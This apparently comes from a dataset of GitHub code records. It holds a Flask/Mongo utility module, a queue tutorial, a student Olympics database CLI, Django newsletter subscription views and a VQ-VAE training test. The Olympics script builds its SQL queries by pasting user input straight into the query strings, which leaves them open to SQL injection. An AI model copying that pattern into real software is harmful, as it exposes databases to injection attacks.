"models.banner.Banner.objects.filter", "line_number": 57, "usage_type": "call"}, {"api_name": "models.banner.Banner.objects", "line_number": 57, "usage_type": "attribute"}, {"api_name": "models.banner.Banner", "line_number": 57, "usage_type": "name"}, {"api_name": "models.banner.Banner.DoesNotExist", "line_number": 63, "usage_type": "attribute"}, {"api_name": "models.banner.Banner", "line_number": 63, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 64, "usage_type": "call"}, {"api_name": "constants.BANNER_DOES_NOT_EXIST", "line_number": 64, "usage_type": "name"}, {"api_name": "models.banner.Banner.objects.filter", "line_number": 69, "usage_type": "call"}, {"api_name": "models.banner.Banner.objects", "line_number": 69, "usage_type": "attribute"}, {"api_name": "models.banner.Banner", "line_number": 69, "usage_type": "name"}, {"api_name": "models.banner.Banner.DoesNotExist", "line_number": 71, "usage_type": "attribute"}, {"api_name": "models.banner.Banner", "line_number": 71, "usage_type": "name"}, {"api_name": 
"rest_framework.exceptions.ValidationError", "line_number": 72, "usage_type": "call"}, {"api_name": "constants.BANNER_DOES_NOT_EXIST", "line_number": 72, "usage_type": "name"}, {"api_name": "models.banner.Banner.objects.filter", "line_number": 77, "usage_type": "call"}, {"api_name": "models.banner.Banner.objects", "line_number": 77, "usage_type": "attribute"}, {"api_name": "models.banner.Banner", "line_number": 77, "usage_type": "name"}, {"api_name": "models.banner.Banner.DoesNotExist", "line_number": 83, "usage_type": "attribute"}, {"api_name": "models.banner.Banner", "line_number": 83, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 84, "usage_type": "call"}, {"api_name": "constants.BANNER_DOES_NOT_EXIST", "line_number": 84, "usage_type": "name"}]} +{"seq_id": "31397882614", "text": "# -*- coding: utf-8 -*-\n#\n# Created by lixing1611 on 17-4-18\n#\nfrom __future__ import absolute_import, unicode_literals\nfrom flask import json\nfrom copy import deepcopy\nfrom bson import ObjectId\nimport requests\n\n\"\"\"\n小工具\n\"\"\"\n\n\nclass BsonSerializer(object):\n def __init__(self, bson):\n self.bson = deepcopy(bson)\n\n def serialize_object_id(self):\n self.bson['_id'] = str(self.bson['_id'])\n return self.bson\n\n @staticmethod\n def serialize_cursor(cursor):\n \"\"\"\n 序列化一个查询结果,里面包含ObjectID\n :param cursor: query cursor object\n :return: serialization list\n \"\"\"\n qrs = []\n for record in cursor:\n record['_id'] = str(record['_id'])\n qrs.append(record)\n return qrs\n\n @staticmethod\n def serialize_fs_files(cursor):\n qrs = []\n for record in cursor:\n record['_id'] = str(record['_id'])\n record['uploadDate'] = str(record['uploadDate'])\n qrs.append(record)\n return qrs\n\n @staticmethod\n def serialize_fs_file(fs_file):\n fs_file['_id'] = str(fs_file['_id'])\n fs_file['uploadDate'] = str(fs_file['uploadDate'])\n return fs_file\n\n def serialize_ov_item(self):\n for site in self.bson.get('sites'):\n info = site['info']\n site['info'] = {'collection': info.collection, '_id': str(info.id)}\n return self.bson\n\n\nclass MongoPagination(object):\n def __init__(self, clt):\n self.clt = clt # collection\n\n def query(self, query_dict, fields=None, last_id=None, limit=10):\n query_dict = deepcopy(query_dict)\n if last_id:\n query_dict['_id'] = {'$gt': ObjectId(last_id)}\n if fields:\n return self.clt.find(query_dict, fields).sort('_id', 1).limit(limit)\n else:\n return self.clt.find(query_dict).sort('_id', 1).limit(limit)\n else:\n if fields:\n return self.clt.find(query_dict, fields).sort('_id', 1).limit(limit)\n else:\n return self.clt.find(query_dict).sort('_id', 1).limit(limit)\n\n\ndef proxy_api(host, api, data):\n url = host + api\n s = json.dumps(data)\n # url = 'http://api.bto-dev.utoper.com/user/account/authcode/phone?phone=15700064975&flag=flag'\n headers = {'content-type': 'application/json',\n 'appId': 'AP339457443459235841',\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0'}\n req = requests.post(url, data=s, headers=headers)\n print(req)\n if req.ok():\n return req.json()\n return None\n", "repo_name": "bi38324/17021001-lung", "sub_path": "app/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 2680, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "copy.deepcopy", "line_number": 18, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 64, "usage_type": "call"}, 
{"api_name": "bson.ObjectId", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.json.dumps", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.json", "line_number": 80, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 85, "usage_type": "call"}]} +{"seq_id": "35784462925", "text": "\"\"\"A queue is a common data structure in computer science and programming that operates\non a \"first-in, first-out\" (FIFO) basis. It's a linear data structure that follows a specific order for adding and\nremoving elements. In a queue, the first element added to the queue is the first one to be removed, similar to people\nwaiting in a line (queue) for a service, like in a supermarket checkout.\n\nKey characteristics of a queue:\n\nFIFO Order: The fundamental principle of a queue is to maintain the order in which elements were added. The element\nthat has been in the queue the longest (the front) is the first to be removed.\n\nTwo Primary Operations:\n\nEnqueue (Add): Adding an element to the back (or rear) of the queue. This operation is also known as \"push\" or\n\"insert.\" Dequeue (Remove): Removing the element from the front (or head) of the queue. This operation is also known\nas \"pop.\" Peek Operation: A method to look at the front element without removing it. It allows you to inspect the\nelement that will be dequeued next.\n\nSize Operation: A method to determine the number of elements currently in the queue.\"\"\"\n\nfrom typing import Any\n\n\nclass Queue:\n \"\"\"A simple queue data structure implemented in Python.\"\"\"\n\n def __init__(self):\n \"\"\"\n Initialize an empty queue.\n \"\"\"\n self.items = []\n\n def is_empty(self) -> bool:\n \"\"\"\n Check if the queue is empty.\n\n Returns:\n bool: True if the queue is empty, False otherwise.\n \"\"\"\n return len(self.items) == 0\n\n def size(self) -> int:\n \"\"\"\n Get the number of elements in the queue.\n\n Returns:\n int: The number of elements in the queue.\n \"\"\"\n return len(self.items)\n\n def enqueue(self, item: Any) -> None:\n \"\"\"\n Add an item to the end of the queue.\n\n Args:\n item (Any): The item to be added to the queue.\n \"\"\"\n self.items.append(item)\n\n def dequeue(self) -> Any:\n \"\"\"\n Remove and return the item from the front of the queue.\n\n Returns:\n Any: The item removed from the queue.\n \"\"\"\n if not self.is_empty():\n return self.items.pop(0)\n\n def peek(self) -> Any:\n \"\"\"\n Get the item at the front of the queue without removing it.\n\n Returns:\n Any: The item at the front of the queue.\n \"\"\"\n if not self.is_empty():\n return self.items[0]\n\n\n# Example usage:\nqueue = Queue()\n\nqueue.enqueue(1)\nqueue.enqueue(2)\nqueue.enqueue(3)\n\nprint(\"Queue size:\", queue.size()) # Output: Queue size: 3\nprint(\"Front of the queue:\", queue.peek()) # Output: Front of the queue: 1\n\nitem = queue.dequeue()\nprint(\"Dequeued item:\", item) # Output: Dequeued item: 1\nprint(\"Queue size after dequeue:\", queue.size()) # Output: Queue size after dequeue: 2\n\n# ==========================================================================================================\n\n# Initialize an empty list to represent the queue\nqueue = []\n\n# Enqueue (add) elements to the back of the queue\nqueue.append(1)\nqueue.append(2)\nqueue.append(3)\n\n# Display the queue\nprint(\"Queue:\", queue) # Output: Queue: [1, 2, 3]\n\n# Dequeue (remove) elements from the front of the queue\nif queue:\n front_element = queue.pop(0)\n print(\"Dequeued element:\", front_element) # Output: 
Dequeued element: 1\nelse:\n print(\"Queue is empty\")\n\n# Peek at the front element without removing it\nif queue:\n front_element = queue[0]\n print(\"Front element:\", front_element) # Output: Front element: 2\nelse:\n print(\"Queue is empty\")\n\n# Determine the size of the queue\nqueue_size = len(queue)\nprint(\"Queue size:\", queue_size) # Output: Queue size: 2\n", "repo_name": "shukranjs/Python-Data-Structures", "sub_path": "data_structures/queue.py", "file_name": "queue.py", "file_ext": "py", "file_size_in_byte": 3729, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "typing.Any", "line_number": 50, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 69, "usage_type": "name"}]} +{"seq_id": "43376877726", "text": "'''\nolympics.py \n10/22/2022\nAuthor: Cathy Duan\n\nDB-driven command-line application assignment \nCS 257: Software Design \nCarleton College\n\nNote: Adapted from Jeff Ondich's psycopg2-sample.py code.\n'''\n\nimport sys\nimport psycopg2\nimport config\n\n\ndef get_connection():\n try:\n return psycopg2.connect(database=config.database, user=config.user)\n \n except Exception as e:\n print(e, file=sys.stderr)\n exit()\n\n\ndef get_athletes(NOC):\n ''' Returns a list of the full names of all the athletes\n in the database who have competed for a user-inputted NOC'''\n athletes = []\n try:\n # Create a \"cursor\"\n connection = get_connection()\n cursor = connection.cursor()\n\n # Execute the query\n query = ''' SELECT DISTINCT athletes.athlete_name\n FROM athletes, team_NOC, event_results\n WHERE team_NOC.NOC = ''' + \"'\" + NOC + \"'\" '''\n AND athletes.id = event_results.athlete_id\n AND team_NOC.id = event_results.team_NOC_id; '''\n cursor.execute(query, (NOC,))\n\n # Iterate over the query results to produce the list of athlete names.\n for row in cursor:\n full_name = row[0]\n athletes.append(f'{full_name}')\n\n except Exception as e:\n print(e, file=sys.stderr)\n\n connection.close()\n return athletes\n\ndef get_NOCs_medal_count(medal_type):\n ''' Returns a list of all NOCs and the count of how many gold medals each NOC has won.'''\n NOCS = []\n medal_count = []\n try:\n query = ''' SELECT COUNT(event_results.medal), team_NOC.NOC\n FROM team_NOC, event_results\n WHERE event_results.medal = ''' + \"'\" + medal_type + \"'\" '''\n AND team_NOC.id = event_results.team_NOC_id\n GROUP BY team_NOC.NOC\n ORDER BY COUNT(event_results.medal) DESC; '''\n connection = get_connection()\n cursor = connection.cursor()\n cursor.execute(query, ())\n for row in cursor:\n count = row[0]\n NOC = row[1]\n medal_count.append(count)\n NOCS.append(f'{NOC}')\n\n except Exception as e:\n print(e, file=sys.stderr)\n\n connection.close()\n return NOCS, medal_count\n\ndef get_events_for_sport(sport, NOC):\n ''' Returns a list of all the sport events that the given encompasses for a given '''\n sport_events = []\n try:\n query = ''' SELECT DISTINCT events.sport_event, team_NOC.NOC\n FROM events, team_NOC, event_results\n WHERE events.sport = ''' + \"'\" + sport + \"'\" '''\n AND team_NOC.NOC = ''' + \"'\" + NOC + \"'\" '''\n AND team_NOC.id = event_results.team_NOC_id; '''\n \n connection = get_connection()\n cursor = connection.cursor()\n cursor.execute(query, (sport, NOC,))\n\n for row in cursor:\n sport_event = row[0]\n sport_events.append(f'{sport_event}')\n\n except Exception as e:\n print(e, file=sys.stderr)\n\n 
connection.close()\n return sport_events\n\n\n# Prints out a NOC's list of athletes\ndef athlete_print(athletes):\n for athlete in athletes: \n print (athlete)\n\n# Prints out each NOC's medal count, the medal type depends on input\ndef NOC_medal_print(NOCs, medal_count):\n for i in range(len(NOCs)):\n print(NOCs[i] + \", \" + str(medal_count[i]) + \" \" + sys.argv[2] + \" medals\")\n\n# Prints out a NOC's list of sport events for a specific sport\ndef event_print(sport_events):\n for event in sport_events:\n print(event)\n\n# Opens, reads, and prints the usage statement\ndef usage_statement_print():\n file = open(\"usage.txt\")\n print(file.read())\n\n\ndef main():\n user_input = sys.argv[1:] # Ignores olympics.py in the command line\n length = len(user_input)\n\n \n if sys.argv[1] == \"--help\" or sys.argv[1] == \"-h\":\n usage_statement_print()\n\n elif length == 2: \n if sys.argv[1] == \"athletes\" or sys.argv[1] == \"-a\":\n athletes = get_athletes(sys.argv[2])\n athlete_print(athletes)\n elif sys.argv[1] == \"NOCs\" or sys.argv[1] == \"-n\":\n NOCs, medal_count = get_NOCs_medal_count(sys.argv[2])\n NOC_medal_print(NOCs, medal_count)\n else: \n print(\"Please refer to the usage statement below\")\n usage_statement_print()\n elif sys.argv[1] == \"events\" or sys.argv[1] == \"-e\": \n if length == 3: \n sport_events = get_events_for_sport(sys.argv[2], sys.argv[3])\n event_print(sport_events)\n elif length > 3: # if the sport is multiple words\n sport = \"\" #sys.argv[2:-1] is a list and needs to be a joined as a string\n for i in (2, length-1):\n if i == 2:\n sport = sys.argv[i]\n else: \n sport = sport + \" \" + sys.argv[i]\n sport_events = get_events_for_sport(sport, sys.argv[-1])\n event_print(sport_events)\n else: \n print(\"Please refer to the usage statement below\")\n usage_statement_print()\n else: \n print(\"Please refer to the usage statement below\")\n usage_statement_print()\n\nif __name__ == '__main__':\n main()\n", "repo_name": "cathduan/cs257", "sub_path": "olympics/olympics.py", "file_name": "olympics.py", "file_ext": "py", "file_size_in_byte": 5334, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "psycopg2.connect", "line_number": 20, "usage_type": "call"}, {"api_name": "config.database", "line_number": 20, "usage_type": "attribute"}, {"api_name": "config.user", "line_number": 20, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 76, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 100, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 114, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 128, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 132, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 136, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 137, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 139, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 140, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 145, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 147, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 153, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 155, "usage_type": "attribute"}, 
{"api_name": "sys.argv", "line_number": 156, "usage_type": "attribute"}]} +{"seq_id": "6245067304", "text": "from collections import defaultdict\ndef solution(n, s, a, b, fares):\n graph_fare = {}\n graph_node = {}\n for i in range(n):\n graph_fare[i+1] = defaultdict(int)\n graph_node[i+1] = list()\n \n for fare in fares:\n graph_fare[fare[0]][fare[1]] = fare[2]\n graph_fare[fare[1]][fare[0]] = fare[2]\n graph_node[fare[0]].append(fare[1])\n graph_node[fare[1]].append(fare[0])\n \n print('graph_fare: ', graph_fare)\n print('graph_node: ', graph_node)\n answer = 0\n return answer\n", "repo_name": "oswaldeff/programmers", "sub_path": "2021_KAKAO_BLIND_RECRUITMENT_TaxiFare.py", "file_name": "2021_KAKAO_BLIND_RECRUITMENT_TaxiFare.py", "file_ext": "py", "file_size_in_byte": 532, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "collections.defaultdict", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "86340794694", "text": "from django.db.models import Q\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect, HttpResponseRedirect\nfrom django.core import serializers\nfrom home.models import *\nfrom django.db.models import F\nfrom home.forms import *\nimport json\nimport random\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.core.mail import send_mail, EmailMessage\nfrom django.template import Context\nfrom django.template.loader import get_template\nfrom django.contrib.auth.models import Group\nimport sys\n\n\n\ndef index(request):\n\tproject_list = Project.objects.filter(publish=True).filter(Q(status_id=1) | Q(status_id=2)).order_by(\"-fiscalyear\")[:10]\n\tyear_list = Ripples.objects.all().distinct('year').order_by('-year').values('year')\n\tripple_list = serializers.serialize('json', Ripples.objects.all().order_by('-year'))\n\tripple_article = serializers.serialize('json', Ripplesarticle.objects.all())\n\treturn render(request, 'home/index.html', {'projects': project_list, 'years': year_list, 'ripples': ripple_list, 'articles': ripple_article})\n\ndef sitemap(request):\n\treturn render(request, 'home/sitemap.html')\n\ndef gen_key():\n\talphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890'\n\tkey = ''\n\tfor x in range(50):\n\t\ti = random.randrange(0, len(alphabet))\n\t\tkey = key+alphabet[i]\n\treturn key\n\ndef send_email_confirmation(request, email):\n\tsubscriber = RipplesSubscribers.objects.get(email=email)\n\n\tkey = subscriber.confirmation_key\n\n\tto = [subscriber.email,]\n\tfrm = 'infotech@grmw.org'\n\tsubj = \"Email Verification\"\n\tverify_href = \"http://\"+str(get_current_site(request))+\"/confirm_subscriber/\"+str(email)+\"/\"+str(key)+\"/\"\n\tunsubscribe_href = \"http://\"+str(get_current_site(request))+\"/unsubscribe/\"+str(email)+\"/\"+str(key)+\"/\"\n\n\tcontext = {\n\t\t'verify_href': verify_href,\n\t\t'unsubscribe_href': unsubscribe_href,\n\t}\n\n\tcontent = get_template('home/email_subscriber_template.html').render(Context(context))\n\n\tsend_mail(subj, \"PLAIN TEXT\", frm, to, fail_silently=False, html_message=content)\n\ndef subscribe(request):\n\tpayload = {\n\t\t'success': False,\n\t\t'message': 'An error occurred while processing your request.',\n\t\t'data': {'error': 'POST ERROR - request.method does not contain POST.'},\n\t}\n\tif request.method == 'POST':\n\t\temail = request.POST['email']\n\t\tform = add_subscriber(request.POST or None)\n\t\tif form.is_valid():\n\t\t\t#Save the user's email to the 
database with unique key\n\t\t\tform = form.save(commit=False)\n\t\t\tform.confirmation_key = gen_key()\n\t\t\tform.email = email\n\t\t\tform.save()\n\n\t\t\t#Send confirmation email to user\n\t\t\tsend_email_confirmation(request, email)\n\n\t\t\tpayload = {\n\t\t\t\t'success': True, \n\t\t\t\t'message': 'An email has been sent to the supplied address, please click the link in the email to confirm your email address. Please note: if you do not complete this step, you will NOT be able to receive electronic copies of our Ripples Newsletter.',\n\t\t\t\t'data': {},\n\t\t\t}\n\t\t\t\n\t\telse:\n\t\t\tpayload = {\n\t\t\t\t'success': False,\n\t\t\t\t'message': 'An error occurred while processing your resquest.',\n\t\t\t\t'data': {'error': form.errors},\n\t\t\t}\n\n\treturn HttpResponse(json.dumps(payload), content_type='application/json')\n\ndef confirm_subscriber(request, email, conf_key):\n\tresponse = render(request, 'home/index.html')\n\tcontext = {}\n\tsubscriber = RipplesSubscribers.objects.get(email=email)\n\tif subscriber:\n\t\tform = add_subscriber(instance=subscriber)\n\t\tif form:\n\t\t\tif(conf_key == subscriber.confirmation_key):\n\t\t\t\tform = form.save(commit=False)\n\t\t\t\tform.confirmed = True\n\t\t\t\tform.save()\n\t\t\t\tresponse = render(request, 'home/email_confirm_complete.html')\n\t\t\telse:\n\t\t\t\tcontext['error'] = \"[ERROR: The provided confirmation key does not match our records]\"\n\t\t\t\tresponse = render(request, 'home/email_confirm_error.html', context)\n\t\telse:\n\t\t\tcontext['error'] = \"We could not find the listed subscriber, please contact infotech@grmw.org and report the issue.\"\n\t\t\tresponse = render(request, 'home/email_confirm_error.html', context)\n\telse:\n\t\tcontext['error'] = \"That subscriber does not exist in our database\"\n\t\tresponse = render(request, 'home/email_confirm_error.html', context)\n\treturn response\n\ndef unsubscribe(request, email, conf_key):\n\tresponse = render(request, 'home/index.html')\n\tcontext = {}\n\tsubscriber = RipplesSubscribers.objects.get(email=email)\n\tif subscriber:\n\t\tform = add_subscriber(instance=subscriber)\n\t\tif form:\n\t\t\tif(conf_key == subscriber.confirmation_key):\n\t\t\t\t#delete subscriber from database\n\t\t\t\tsubscriber.delete()\n\t\t\t\tresponse = render(request, 'home/email_unsubscribe.html')\n\t\t\telse:\n\t\t\t\tcontext['error'] = \"[ERROR: The provided confirmation key does not match our records]\"\n\t\t\t\tresponse = render(request, 'home/email_confirm_error.html', context)\n\t\telse:\n\t\t\tcontext['error'] = \"We could not find the listed subscriber, please contact infotech@grmw.org and report the issue.\"\n\t\t\tresponse = render(request, 'home/email_confirm_error.html', context)\n\telse:\n\t\tcontext['error'] = \"That subscriber does not exist in our database\"\n\t\tresponse = render(request, 'home/email_confirm_error.html', context)\n\treturn response\n\ndef ripples_dashboard(request):\n\tresponse = HttpResponseRedirect(\"/\")\n\t#make sure that we are the admin before we show this page\n\tis_admin = False\n\tgroup = Group.objects.get(name=\"Site Admin\")\n\tif group in request.user.groups.all():\n\t\tis_admin = True\n\n\tif is_admin == True:\n\t\tripples = Ripples.objects.all().order_by(\"-year\", \"-edition_id\")\n\t\tcontext = {\n\t\t\t'ripples_objects': ripples,\n\t\t}\n\t\tresponse = render(request, \"home/ripples-admin.html\", context)\n\telse:\n\t\tresponse = HttpResponseRedirect(\"/\")\n\n\n\treturn response\n\ndef send_newsletter(request):\n\tresponse = 
HttpResponseRedirect(\"/\")\n\tis_admin = False\n\tgroup = Group.objects.get(name=\"Site Admin\")\n\tif group in request.user.groups.all():\n\t\tis_admin = True\n\n\tif is_admin == True: \n\t\tif request.method == \"POST\":\n\t\t\t#get all ripples\n\t\t\tripple_id = request.POST.get('id_ripple')\n\t\t\tripples = Ripples.objects.all().order_by(\"-year\", \"-edition_id\")\n\t\t\tripple_to_send = ripples.filter(pk=ripple_id)[0]\n\n\t\t\t#build context and render the template with context\n\t\t\tcontext = {\n\t\t\t\t'content': request.POST.get('id_content')\n\t\t\t}\n\t\t\tctxt={\n\t\t\t\t'message': 'Ripples Newsletter Sent',\n\t\t\t\t'ripples_objects': ripples,\n\t\t\t}\n\n\t\t\t#get all subscribers\n\t\t\tsubscribers=[]\n\t\t\trecipients = RipplesSubscribers.objects.all().filter(confirmed=True)\n\t\t\tfor recipient in recipients:\n\t\t\t\tsubscribers.append(recipient.email)\n\t\t\t\tcontext['href_unsubscribe'] = \"http://\"+str(get_current_site(request))+\"/unsubscribe/\"+str(recipient.email)+\"/\"+str(recipient.confirmation_key)+\"/\"\n\t\t\t\tcontent = get_template('home/email_newsletter_template.html').render(Context(context)) \n\t\t\t\ttry:\n\t\t\t\t\t#setup and send email\n\t\t\t\t\tmessage = EmailMessage(request.POST.get('id_subject'), content, \"infotech@grmw.org\", [recipient.email,])\n\t\t\t\t\tmessage.attach_file(str(ripple_to_send.file))\n\t\t\t\t\tmessage.content_subtype = \"html\"\n\t\t\t\t\tmessage.send()\n\t\t\t\texcept:\n\t\t\t\t\tctxt['message'] = 'An error occurred - '+str(sys.exc_info()[0])\n\n\t\t\tresponse = render(request, \"home/ripples-admin.html\", ctxt)\n\treturn response", "repo_name": "tarstarkes/Icarus", "sub_path": "main/home/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7086, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.db.models.Q", "line_number": 20, "usage_type": "call"}, {"api_name": "django.core.serializers.serialize", "line_number": 22, "usage_type": "call"}, {"api_name": "django.core.serializers", "line_number": 22, "usage_type": "name"}, {"api_name": "django.core.serializers.serialize", "line_number": 23, "usage_type": "call"}, {"api_name": "django.core.serializers", "line_number": 23, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 24, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 27, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 33, "usage_type": "call"}, {"api_name": "django.contrib.sites.shortcuts.get_current_site", "line_number": 45, "usage_type": "call"}, {"api_name": "django.contrib.sites.shortcuts.get_current_site", "line_number": 46, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 53, "usage_type": "call"}, {"api_name": "django.template.Context", "line_number": 53, "usage_type": "call"}, {"api_name": "django.core.mail.send_mail", "line_number": 55, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 89, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 89, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 92, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 102, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 105, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 108, "usage_type": "call"}, {"api_name": "django.shortcuts.render", 
"line_number": 111, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 115, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 124, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 127, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 130, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 133, "usage_type": "call"}, {"api_name": "django.shortcuts.HttpResponseRedirect", "line_number": 137, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Group.objects.get", "line_number": 140, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Group.objects", "line_number": 140, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 140, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 149, "usage_type": "call"}, {"api_name": "django.shortcuts.HttpResponseRedirect", "line_number": 151, "usage_type": "call"}, {"api_name": "django.shortcuts.HttpResponseRedirect", "line_number": 157, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Group.objects.get", "line_number": 159, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Group.objects", "line_number": 159, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 159, "usage_type": "name"}, {"api_name": "django.contrib.sites.shortcuts.get_current_site", "line_number": 184, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 185, "usage_type": "call"}, {"api_name": "django.template.Context", "line_number": 185, "usage_type": "call"}, {"api_name": "django.core.mail.EmailMessage", "line_number": 188, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 193, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 195, "usage_type": "call"}]} +{"seq_id": "29815611256", "text": "import os.path\nimport unittest\nfrom os import listdir\nfrom tempfile import TemporaryDirectory\n\nimport numpy as np\n\nfrom models.loaders.config import load_config\nfrom models.train_vq_vae import train\nfrom scraper import scraper\n\n\nclass VAEModelTestCase(unittest.TestCase):\n def test_training(self) -> None:\n with TemporaryDirectory() as tempdir:\n config = load_config(run_id='dummy', artifact_folder=os.path.join(tempdir, 'dummy'))\n artifact_folder = config['models']['vq_vae']['artifacts']['folder']\n config['models']['vq_vae']['artifacts']['resume_model'] = None\n\n # Override image location and filter settings\n config['data']['images']['folder'] = os.path.join(tempdir, 'img')\n config['data']['images']['filter']['include'] = None\n config['data']['images']['filter']['exclude'] = []\n config['data']['images']['filter']['orientation'] = 'any'\n\n set_no = 5159\n config['data']['images']['scraper']['first_set'] = set_no\n config['data']['images']['scraper']['last_set'] = set_no\n\n with self.subTest(f'It harvests set number {set_no}'):\n scraper.scrape(config)\n\n config['models']['vq_vae']['artifacts']['logs']['folder'] = artifact_folder\n\n # Simplify training\n config['models']['vq_vae']['data_generator']['fit_samples'] = 10\n\n num_epochs = 2\n config['models']['vq_vae']['epochs'] = num_epochs\n\n checkpoint_interval = num_epochs\n config['models']['vq_vae']['artifacts']['checkpoints']['save_every_epoch'] = checkpoint_interval\n config['models']['vq_vae']['artifacts']['reconstructions']['save_every_epoch'] = 
checkpoint_interval\n\n config['models']['vq_vae']['batches_per_epoch'] = 2\n\n batch_size = 2\n config['models']['vq_vae']['batch_size'] = batch_size\n\n # Dummy-train\n history = train(config)\n epoch_2_folder = os.path.join(artifact_folder, 'checkpoints', 'epoch-2')\n\n with self.subTest('The loss is a valid float'):\n assert history is not None\n last_epoch_loss = history.history.get('loss')[-1]\n self.assertFalse(np.isnan(last_epoch_loss))\n\n with self.subTest('It generates a set of artifact directories'):\n artifacts = listdir(artifact_folder)\n self.assertSetEqual(\n set(artifacts),\n {'checkpoints', 'scripts', 'reconstructions', 'tensorboard', 'logfile.txt'},\n f\"Got: {artifacts} from {artifact_folder}\")\n\n with self.subTest(f'It generates a checkpoint dir for epoch intervals of {checkpoint_interval}'):\n epochs = listdir(os.path.join(artifact_folder, 'checkpoints'))\n self.assertSetEqual(set(epochs), {'epoch-2'})\n\n with self.subTest('It generates a folder for the decoder and encoder'):\n contents = listdir(epoch_2_folder)\n self.assertIn('vq_vae', contents)\n\n samples = listdir(os.path.join(artifact_folder, 'reconstructions'))\n with self.subTest(\"It generates at least one image sample for each epoch\"):\n self.assertIn(f'epoch-{num_epochs}-1.png', samples)\n", "repo_name": "Antfield-Creations/fafa-vae", "sub_path": "tests/test_autoencoder_e2e.py", "file_name": "test_autoencoder_e2e.py", "file_ext": "py", "file_size_in_byte": 3349, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "unittest.TestCase", "line_number": 13, "usage_type": "attribute"}, {"api_name": "tempfile.TemporaryDirectory", "line_number": 15, "usage_type": "call"}, {"api_name": "models.loaders.config.load_config", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 16, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 21, "usage_type": "name"}, {"api_name": "scraper.scraper.scrape", "line_number": 31, "usage_type": "call"}, {"api_name": "scraper.scraper", "line_number": 31, "usage_type": "name"}, {"api_name": "models.train_vq_vae.train", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.isnan", "line_number": 57, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 60, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 67, "usage_type": 